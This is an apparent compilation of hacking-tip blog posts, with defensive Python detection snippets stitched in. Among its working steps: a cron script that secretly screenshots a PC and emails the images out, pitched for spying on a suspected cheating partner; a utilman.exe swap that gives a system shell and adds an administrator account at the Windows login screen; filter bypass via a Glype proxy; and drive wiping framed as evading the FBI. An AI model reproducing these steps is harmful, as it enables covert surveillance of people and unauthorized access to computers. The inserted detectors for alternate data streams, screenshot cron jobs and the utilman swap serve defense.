Chances are if you’re running Windows you are also using NTFS as your partition format. Little did you know there is a cool way to hide data using Alternate Data Streams.
According to heysoft.de:
“In NTFS, a file consists of different data streams. One stream holds the security information (access rights and such things), another one holds the “real data” you expect to be in a file. There may be another stream with link information instead of the real data stream, if the file actually is a link. And there may be alternate data streams, holding data the same way the standard data stream does.”
Supposedly a man could hide a lot of data in these alternate data streams – aka forks. By using something as simple as the command prompt you can create and modify an ADS. You can hide ASCII data as well as binary data, provided you use the correct commands.
Some examples:
Create an ADS:
notepad visible.txt:hidden.txt
Insert ASCII data into a second ADS (yes, you can do multiples):
type atextfile > visible.txt:hidden2.txt
Copy the ADS back into a ‘normal’ file:
more < visible.txt:hidden2.txt > newfile.txt
See more examples at heysoft.de. It is also possible to hide this data in directories.
NOTE: ADSs are not secure in any way. This method simply hides data from default views. It is possible to see the ADSs in Vista with the dir /R! Other tools are available for earlier OSs.
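To review what `dir /R` reveals, the following added example (not from the original post) parses its output and lists every named stream, setting aside the Zone.Identifier stream that Windows itself attaches to downloaded files. The sample listing is constructed, and the function names are illustrative.

```python
import re
from typing import NamedTuple

# Constructed sample of `dir /R` output; not captured from a real system.
SAMPLE_DIR_R = r"""
 Directory of C:\demo

01/15/2009  10:02 AM                12 visible.txt
                                    27 visible.txt:hidden.txt:$DATA
                                    14 visible.txt:hidden2.txt:$DATA
01/15/2009  10:05 AM           104,448 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
01/15/2009  10:06 AM    <DIR>          notes
                                     9 notes:stash.bin:$DATA
               2 File(s)        104,460 bytes
"""

# Stream lines have no date column: indent, size, then host:stream:$DATA.
STREAM_LINE = re.compile(r"^[ \t]+([\d,]+)[ \t]+(.+):([^:]+):\$DATA[ \t]*$")
# Zone.Identifier is the download marker Windows itself attaches to files.
EXPECTED_STREAMS = {"zone.identifier"}

class Stream(NamedTuple):
    host: str
    name: str
    size: int

def find_streams(dir_r_output):
    """Return every named stream listed in `dir /R` output."""
    streams = []
    for line in dir_r_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size, host, name = m.groups()
            streams.append(Stream(host, name, int(size.replace(",", ""))))
    return streams

def unexpected_streams(dir_r_output):
    """Drop streams the OS is known to create, keep the rest for review."""
    return [s for s in find_streams(dir_r_output)
            if s.name.lower() not in EXPECTED_STREAMS]

if __name__ == "__main__":
    for s in unexpected_streams(SAMPLE_DIR_R):
        print(f"{s.host}: stream '{s.name}' ({s.size} bytes)")
```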
What would be really cool is some sort of hybrid cryptography ADS with passwords. Any additions to this thought? Leave us a comment.
[via heysoft.de]
By using a web host that has PHP you can bypass almost any web filter and access blocked sites by using a proxy script named Glype.
From the Glype site:
Glype Proxy is a free web-based proxy script written in PHP. It allows webmasters to quickly and easily set up their own proxy site. There is a huge market for these proxy websites that allow both anonymous browsing and bypassing network filters at school, college or work.
Despite the huge popularity of these sites, the choice of scripts available is limited with most either incomplete or problematic. Glype Proxy is intended to be a fast and reliable alternative to the widely used PHProxy (now discontinued) and CGIProxy.
The process of installation couldn’t be any simpler:
- Upload the contents of the ‘upload’ folder inside of the Glype download to a secret directory on your webserver. It is a very good idea to add password protection to this directory (thanks Roland).
- Navigate to the appropriate URL where you installed Glype. Ex. http://yourdomain.com/mysecretdirectory/index.php. You should see a screen similar to this:

- Type the URL in the box and browse away!
Now you know how simple it is to bypass any web proxy with your very own! Note that Glype also has many other configurable options such as themes (the default is horrid), blacklist/whitelist, plugins, and more.
If you have different PHP proxy scripts that you use, let us know in the comments. How do they compare to Glype?
Silvan over at techblog.tilllate.com has done some research for us on the best ways of obfuscating email addresses on a web page.
The method used involved nine different code snippets, three of which received zero spam over a period of one and a half years.
The Three Methods:
- Changing the code direction with CSS:
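<style type="text/css">
span.codedirection { unicode-bidi: bidi-override; direction: rtl; }
</style>
<!-- The address is stored reversed in the markup; the RTL override displays it as email@domain.com -->
<p><span class="codedirection">moc.niamod@liame</span></p>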
- Using CSS display:none:
<style type="text/css">
p span.displaynone { display: none; }
</style>
<!-- The hidden span breaks up the address in the source but is not rendered -->
<p>email@<span class="displaynone">null</span>domain.com</p>
- ROT13 Encryption (using rot13 or str_rot13):
<script type="text/javascript">
// Decode the ROT13-encoded anchor tag in the browser and write it into the page
document.write("<n uers=\"znvygb:fvyinasbbone10@gvyyyngr.pbz\" ery=\"absbyybj\">".replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);}));
</script>silvanfoobar’s Mail</a>
See more about this at techblog.tilllate.com. I noticed he didn’t include other methods that I’ve seen, such as breaking out the email address in a non-visible table, etc.
Have any other tips to obfuscate email addresses? Let us know in the comments.
Not a Linux user? Stay tuned, I will be posting a Windows version soon.
Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.
By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.
The process is as follows:
- Cron takes a screen shot of the desktop and saves it to a file using the import command.
- Cron emails the screenshot to a specified address on a specific interval by using mutt.
The process is quite simple. Just open your terminal and follow these steps (tested on Ubuntu, should work on other distros as well):
- Install postfix, mutt, and imagemagick (for import):
sudo apt-get install postfix mutt imagemagick
- Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
nano /path/to/message.txt
- Create a file named ‘spy.sh’ (save it somewhere secretive) and add the following lines (the mutt command is a single line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory though):
#!/bin/sh
# Timestamp for the file name; %H gives a zero-padded hour (%k pads with a space)
NOW=$(date +%Y%m%d%H%M)
cd /tmp
# Capture the whole desktop (root window) with ImageMagick's import
import -window root "screenshot-$NOW.jpg"
# Mail the screenshot as an attachment, using message.txt as the body
mutt -s "Screenshot for $NOW" -a "./screenshot-$NOW.jpg" emailaccount@domain.com < /path/to/message.txt
# Remove the local copy
rm "/tmp/screenshot-$NOW.jpg"
- Now make the spy.sh executable:
chmod u+x /path/to/spy.sh
- Run the following (my cron didn’t run without it):
sudo touch /etc/cron.deny
- Edit your crontab (‘sudo crontab -e’) and enter the following:
*/5 * * * * /path/to/spy.sh
WARNING: This will email you a screenshot every 5 minutes. While this is great for spying, beware that your email could fill up pretty quickly! Change the minutes field in your crontab to send less often, e.g. */10 for every 10 minutes or */20 for every 20 minutes.
TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!
TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.
That’s it! You should start receiving screenshots of your desktop in action once the cron job has run its first cycle. If you have any problems or questions feel free to leave a comment.
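Seen from the other side, a setup like this is easy to spot in a crontab audit. The following added example (not from the original post) flags cron entries whose command, or the script it runs, calls `import -window root`, including entries that were only commented out as in the TIP above. The sample crontab and script are constructed, and the function and field names are illustrative.

```python
import re

# Constructed sample: a root crontab and the script it points at, mirroring the steps above.
SAMPLE_CRONTAB = """\
MAILTO=root
# m h dom mon dow command
17 * * * * run-parts /etc/cron.hourly
*/5 * * * * /path/to/spy.sh
#*/20 * * * * /path/to/spy.sh
"""
SAMPLE_SCRIPTS = {"/path/to/spy.sh": """\
#!/bin/sh
NOW=$(date +%Y%m%d%H%M)
cd /tmp
import -window root screenshot-$NOW.jpg
mutt -s "Screenshot for $NOW" -a ./screenshot-$NOW.jpg emailaccount@domain.com < /path/to/message.txt
rm /tmp/screenshot-$NOW.jpg
"""}

CAPTURE = re.compile(r"\bimport\s+-window\s+root\b")   # full-desktop grab
MAIL_ATTACH = re.compile(r"\bmutt\b.*\s-a\s")            # mutt sending an attachment

def audit_crontab(crontab_text, read_script):
    """Flag cron entries whose command, or the script it runs, captures the screen.

    read_script(path) returns the script text, or None if it cannot be read.
    """
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        disabled = line.startswith("#")      # commented-out entries are still of interest
        fields = line.lstrip("# ").split(None, 5)
        if len(fields) < 6:
            continue                          # blank line, env assignment, or plain comment
        schedule, command = " ".join(fields[:5]), fields[5]
        body = command + "\n" + (read_script(command.split()[0]) or "")
        if CAPTURE.search(body):
            findings.append({"schedule": schedule, "command": command,
                             "disabled": disabled,
                             "mails_attachment": bool(MAIL_ATTACH.search(body))})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_SCRIPTS.get):
        print(f)
```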
Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Let’s hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ‘self contained floppy disc’ that securely wipes all hard drives detected on the local PC.
From the README:
1.0 About Darik’s Boot and Nuke
-------------------------------
Darik’s Boot and Nuke ("DBAN") is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.
Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk and boot from it!
Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).
I know a lot of you no longer have floppy drives – there are more convenient DBAN CD images available.
How to automatically wipe all hard drives
WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVES HOOKED TO THE PC!!!
- Boot from the DBAN floppy or CD image.
- Enter ‘autonuke’ at the boot prompt.
And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!
Have you ever changed or forgotten your Windows password? Fear not because I have the solution for you – and it’s completely free.

The following method works on Windows XP and Vista.
All you need is a Linux live CD (that auto mounts Windows partitions – ex. Ubuntu, Backtrack, Fedora, openSUSE).
Save the .iso and burn it to a disc.
Boot from the CD and follow these simple instructions – these instructions assume you are using BackTrack, but should be similar for other Linux distributions:
- Open a Linux terminal and enter the following commands:
- cd /mnt
- ls (Take note of the folders listed here. You might need them in the next step.)
- cd sda1/Windows/System32/ (If this didn’t work you might have the wrong hard drive; try replacing ‘sda1’ with sda2, hda1, or hda2)
- mv utilman.exe utilman.old && cp cmd.exe utilman.exe
- reboot (and remove the CD)
- Once rebooted, at the Vista or XP login screen, press Windows key + U to run CMD with system privileges. Replace username below with the one of your choice – it must not already exist!
- c:\>net user username mypassword /add
- c:\>net localgroup administrators username /add
- Log in with the new admin account!
After completing these steps, don’t forget to copy utilman.old back over utilman.exe or you will leave your system vulnerable – this is very important!!
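A check for the state this warning describes, as an added example (not from the original post): it reports when utilman.exe is byte-identical to cmd.exe or when a utilman.old copy is still sitting in the directory. The function names are illustrative and the demo directory holds tiny constructed files rather than real binaries; in practice, point it at a live or offline-mounted System32 directory.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def check_utilman_swap(system32, targets=("utilman.exe",)):
    """Report accessibility binaries replaced by cmd.exe, plus leftover .old copies."""
    # Windows names are case-insensitive, but a Linux mount of the volume may not be.
    files = {p.name.lower(): p for p in Path(system32).iterdir() if p.is_file()}
    cmd = files.get("cmd.exe")
    cmd_hash = sha256(cmd) if cmd else None
    findings = []
    for target in targets:
        exe = files.get(target.lower())
        if exe and cmd_hash and sha256(exe) == cmd_hash:
            findings.append(f"{exe.name} is byte-identical to cmd.exe")
        backup = files.get(Path(target).stem.lower() + ".old")
        if backup:
            findings.append(f"{backup.name} found next to {target}")
    return findings

def build_demo_dir(root, swapped):
    """Constructed stand-in for System32: tiny fake files, not real binaries."""
    root = Path(root)
    (root / "cmd.exe").write_bytes(b"fake cmd body")
    if swapped:
        (root / "utilman.old").write_bytes(b"fake utilman body")
        (root / "Utilman.exe").write_bytes(b"fake cmd body")
    else:
        (root / "Utilman.exe").write_bytes(b"fake utilman body")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in check_utilman_swap(build_demo_dir(tmp, swapped=True)):
            print("FINDING:", finding)
```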
I hope this helped in regaining access into your XP or Vista PC and if you know of any other tips like this please let us know in the comments.
UPDATE: Here is a backtrack video tutorial that covers the instructions.